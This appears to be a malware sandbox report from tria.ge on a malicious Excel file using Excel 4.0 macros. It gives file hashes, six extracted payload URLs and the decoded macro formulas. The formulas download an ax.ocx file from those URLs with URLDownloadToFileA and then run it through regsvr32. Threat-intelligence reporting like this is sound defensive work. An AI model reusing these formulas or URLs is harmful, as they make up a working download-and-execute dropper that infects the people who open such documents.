Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
01d46fbc434cac0d7fe6199f7c078c515df5017349c27f2a72e4396f7f922691
-
Size
49KB
-
MD5
43ac7d2d107eea7f123a3901c11f3a05
-
SHA1
d93d635ffe45ffefa3af528af1fb2354548e1853
-
SHA256
01d46fbc434cac0d7fe6199f7c078c515df5017349c27f2a72e4396f7f922691
-
SHA512
2d3fb401250a0241d3cfca707a8171abf2db04af83867eabeaa00dd5a4cecdffce6d5a729888044cc2ee6c9746d4fec4d3f09dd87f45cf0047e8f439919bba31
-
SSDEEP
768:WYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:WYu2xXncDSmSIBlGeuSEcm2h0B5lqB
Malware Config
Extracted
http://retailhpsinterview.com/search/yNbsL/
http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/
http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/
http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/
https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/
https://gsmjordan.com/SupplierPanel/XII/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://retailhpsinterview.com/search/yNbsL/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gsmjordan.com/SupplierPanel/XII/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
01d46fbc434cac0d7fe6199f7c078c515df5017349c27f2a72e4396f7f922691